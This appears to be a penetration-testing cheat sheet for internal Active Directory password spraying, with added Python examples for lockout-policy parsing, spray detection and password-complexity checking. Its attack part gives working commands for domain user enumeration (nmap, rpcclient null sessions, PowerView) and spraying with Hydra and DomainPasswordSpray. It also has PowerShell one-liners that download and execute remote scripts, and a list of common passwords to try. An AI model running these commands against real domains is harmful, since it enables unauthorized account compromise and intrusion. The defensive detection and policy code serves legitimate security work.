Internal Password Spraying
Get domain users using Kerberos
dig SRV _ldap._tcp.dc._msdcs.Domain_Name // Find Domain Controller (the SRV record lists the DCs)
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=users.txt 10.196.1.13
Get domain users using powerview
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1");
Get-DomainUser | select -ExpandProperty samaccountname > users.txt // -ExpandProperty keeps the header/underline out of the list
Get domain users using rpcclient
nmap -Pn -sS -p389,88 --open 10.10.0.0/16 // Find Domain Controller
rpcclient -U "" -N 10.10.1.50 // Authenticate Using Null Session
rpcclient -U "MEGA\hsaad" 10.10.1.50 // Authenticate Using Domain User & Password
>> enumdomusers // Enumerate All Domain Users
Get domain password policy using powerview
(Get-DomainPolicy)."SystemAccess"
Get domain password policy using rpcclient
>> getdompwinfo
Password Spraying Using Hydra
Don't forget the lockout threshold if one exists: for example, if it is set to 5 attempts in 30 minutes, you can only make 4 failed attempts against each account every 30 minutes.
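As an added illustration (not part of the original page), the snippet below parses the [System Access] keys that (Get-DomainPolicy)."SystemAccess" returns from the domain's GptTmpl.inf and turns the lockout settings into the rule stated above. The policy text is a constructed sample; the key names (LockoutBadCount, ResetLockoutCount, LockoutDuration, MinimumPasswordLength) are the standard SecEdit keys, and the review thresholds in policy_findings are assumptions.

```python
"""Parse the [System Access] block of a domain password policy and report what
its lockout settings mean for a password spray.

Added example, not code from the page or from PowerView. The policy text is a
constructed sample; the key names are the standard SecEdit/GptTmpl.inf keys
that (Get-DomainPolicy)."SystemAccess" returns (LockoutBadCount,
ResetLockoutCount, LockoutDuration, MinimumPasswordLength, ...)."""

import re

# Constructed sample resembling a default-domain-policy [System Access] section.
SAMPLE_POLICY = """\
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 42
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 5
ResetLockoutCount = 30
LockoutDuration = 30
"""


def parse_system_access(text):
    """Return the [System Access] key/value pairs; numeric values become ints."""
    policy = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[system access]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            value = value.strip().strip('"')
            policy[key.strip()] = int(value) if re.fullmatch(r"-?\d+", value) else value
    return policy


def lockout_posture(policy):
    """Turn LockoutBadCount / ResetLockoutCount into the rule the page states:
    staying under lockout allows LockoutBadCount - 1 failures per account per
    ResetLockoutCount minutes. LockoutBadCount = 0 means lockout is disabled,
    i.e. there is no limit at all (the worst posture for the defender)."""
    threshold = policy.get("LockoutBadCount", 0)
    window = policy.get("ResetLockoutCount", 0)
    if threshold == 0:
        return {"lockout_enabled": False, "attempts_per_window": None, "window_minutes": None}
    return {"lockout_enabled": True, "attempts_per_window": threshold - 1, "window_minutes": window}


def policy_findings(policy):
    """Settings a reviewer would flag as weak; the thresholds are assumptions."""
    findings = []
    if policy.get("LockoutBadCount", 0) == 0:
        findings.append("LockoutBadCount is 0: no lockout, unlimited guesses")
    if policy.get("MinimumPasswordLength", 0) < 12:
        findings.append("MinimumPasswordLength below 12")
    if policy.get("PasswordComplexity", 0) != 1:
        findings.append("PasswordComplexity disabled")
    return findings


if __name__ == "__main__":
    pol = parse_system_access(SAMPLE_POLICY)
    print(lockout_posture(pol))
    print(policy_findings(pol))
```

With the sample policy the posture is 4 attempts per account every 30 minutes, matching the note above; the same parser works on the raw GptTmpl.inf from SYSVOL, which is what Get-DomainPolicy reads.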
hydra -V -L users.txt -P pass.txt -m MEGA.local -t 1 10.10.1.50 smb
hydra -V -L users.txt -e nsr -m MEGA.local -t 1 10.10.1.50 smb
Password Spraying Using DomainPasswordSpray
By default, the tool enumerates the users in the domain and then filters out any disabled account and any account that has already reached the lockout limit.
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1");
Invoke-DomainPasswordSpray -Password Spring2017
Invoke-DomainPasswordSpray -UserList users.txt -PasswordList passlist.txt
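From the defender's side, both tools above leave the same footprint on the domain controllers: one source producing wrong-password failures against many different accounts while keeping each account below the lockout threshold. The detection below is an added example (not from the page, nor a vendor rule) that flags that shape over failed-logon records. The records are a constructed, simplified rendering of Windows Security event 4625 fields (TimeCreated, TargetUserName, IpAddress, SubStatus), and SubStatus 0xC000006A is the "wrong password" code.

```python
"""Flag the password-spray shape in failed-logon telemetry: one source, many
distinct accounts, few failures per account within the lockout window.

Added example, not the page's code or any SIEM rule. The records are a
constructed, simplified rendering of Windows Security event 4625 fields as a
collector might normalise them; SubStatus 0xC000006A is "wrong password"."""

from collections import Counter, defaultdict
from datetime import datetime, timedelta

WRONG_PASSWORD = "0xC000006A"


def make_sample_events():
    """Constructed sample: 10.10.5.77 tries one password against 40 accounts in
    two minutes (spray); 10.10.9.12 hammers a single account (brute force);
    10.10.2.3 is a user mistyping twice (benign)."""
    t0 = datetime(2024, 5, 1, 9, 0, 0)

    def ev(offset_s, user, ip):
        return {"EventID": 4625,
                "TimeCreated": (t0 + timedelta(seconds=offset_s)).isoformat(),
                "TargetUserName": user, "IpAddress": ip, "SubStatus": WRONG_PASSWORD}

    events = [ev(3 * i, f"user{i:02d}", "10.10.5.77") for i in range(40)]
    events += [ev(2 * i, "svc_backup", "10.10.9.12") for i in range(40)]
    events += [ev(0, "alice", "10.10.2.3"), ev(20, "alice", "10.10.2.3")]
    return events


def detect_spray(events, window=timedelta(minutes=30), min_users=10, max_per_user=4):
    """Return one alert per source IP whose wrong-password failures, inside any
    span no longer than `window`, hit at least `min_users` distinct accounts
    while no single account took more than `max_per_user` failures.
    Set `max_per_user` to LockoutBadCount - 1 and `window` to the lockout
    observation window: that is exactly the rate a spray keeps to in order to
    avoid lockouts, so it is the shape to alert on. A single-account brute
    force (many failures, one user) is deliberately left to a separate rule."""
    by_source = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625 and e["SubStatus"] == WRONG_PASSWORD:
            by_source[e["IpAddress"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["TargetUserName"]))

    alerts = []
    for src, failures in by_source.items():
        failures.sort()
        best = None
        start = 0
        for end in range(len(failures)):
            # Advance the window start so the span never exceeds `window`.
            while failures[end][0] - failures[start][0] > window:
                start += 1
            span = failures[start:end + 1]
            per_user = Counter(user for _, user in span)
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                if best is None or len(per_user) > best["distinct_users"]:
                    best = {"source": src, "distinct_users": len(per_user),
                            "failures": len(span),
                            "first": span[0][0].isoformat(), "last": span[-1][0].isoformat()}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(make_sample_events()):
        print(alert)
```

Two caveats a practitioner should keep in mind: a Kerberos-based spray shows up as event 4771 with failure code 0x18 rather than 4625, so the same logic should also be keyed on those records; and a spray distributed across many source addresses defeats the per-IP grouping, so a second rule should count distinct accounts with wrong-password failures domain-wide per window, ignoring the source.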
Common Passwords
12345
123456
123456789
P@ssw0rd
P@ssword
P@ssword@123
password@123
Company_name@123
admin@123
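Most of the passwords in the list above satisfy the default "Password must meet complexity requirements" rule, which is why complexity alone does not stop a spray and a banned-word filter is needed on top. The check below is an added example (not from the page): it applies the documented complexity rule (minimum length, no samAccountName or 3+ character display-name token, three of five character classes) and a simple banned-word match. The account name and the banned list are constructed, and the de-leet normalisation is a simplified stand-in for a real banned-password filter, not Microsoft's algorithm.

```python
"""Check candidate passwords against the default AD complexity rule and a
custom banned-word list. Added example, not the page's code; the sample
account, the banned list and the de-leet map are constructed, and the
normalisation is a simplified stand-in for a real banned-password filter."""

import re

# Non-alphanumeric characters Windows counts as the "special" class.
SYMBOLS = set("~!@#$%^&*_-+=`|\\(){}[]:;\"'<>,.?/")
# Constructed substitution map: undo the common leet tricks before matching.
LEET = str.maketrans({"@": "a", "0": "o", "1": "i", "3": "e", "$": "s",
                      "4": "a", "5": "s", "!": "i", "7": "t"})


def meets_ad_complexity(password, sam_account_name, display_name="", min_length=7):
    """Documented Windows complexity rule: at least `min_length` characters
    (the domain's MinimumPasswordLength; the rule itself requires 6), must not
    contain the samAccountName (checked whole, if 3+ chars) or any display-name
    token of 3+ chars split on , . - _ space # tab, and must use characters
    from at least three of five classes."""
    if len(password) < min_length:
        return False
    lowered = password.lower()
    if len(sam_account_name) >= 3 and sam_account_name.lower() in lowered:
        return False
    for token in re.split(r"[,.\-_ #\t]+", display_name):
        if len(token) >= 3 and token.lower() in lowered:
            return False
    classes = [any(c.isupper() for c in password),
               any(c.islower() for c in password),
               any(c.isdigit() for c in password),
               any(c in SYMBOLS for c in password),
               any(c.isalpha() and not c.isupper() and not c.islower() for c in password)]
    return sum(classes) >= 3


def banned_hit(password, banned_words):
    """Return the first banned word found in the password, matched against both
    the lower-cased form and its de-leeted form; None if nothing matches."""
    forms = (password.lower(), password.lower().translate(LEET))
    for word in banned_words:
        if any(word in form for form in forms):
            return word
    return None


# The list from the page, and a constructed banned list a domain might enforce.
PAGE_COMMON_PASSWORDS = ["12345", "123456", "123456789", "P@ssw0rd", "P@ssword",
                         "P@ssword@123", "password@123", "Company_name@123", "admin@123"]
BANNED = ["password", "admin", "welcome", "company", "123456", "12345"]


def evaluate_list(passwords, sam="jdoe", display_name="John Doe", min_length=7, banned=BANNED):
    """For each password: would default complexity accept it, and which banned word
    (if any) would stop it. Account details are constructed sample values."""
    return [{"password": pw,
             "complexity_ok": meets_ad_complexity(pw, sam, display_name, min_length),
             "banned": banned_hit(pw, banned)} for pw in passwords]


def count_accepted_by_complexity(passwords, **kwargs):
    """How many of the passwords the complexity rule alone would let through."""
    return sum(1 for row in evaluate_list(passwords, **kwargs) if row["complexity_ok"])


if __name__ == "__main__":
    for row in evaluate_list(PAGE_COMMON_PASSWORDS):
        print(row)
    print(count_accepted_by_complexity(PAGE_COMMON_PASSWORDS), "of",
          len(PAGE_COMMON_PASSWORDS), "pass complexity alone")
```

With a 7-character minimum, six of the nine passwords above pass the complexity rule (only the three all-digit ones fail), while the banned list catches all nine; that gap is the argument for a banned-password filter and for a longer minimum length rather than relying on complexity.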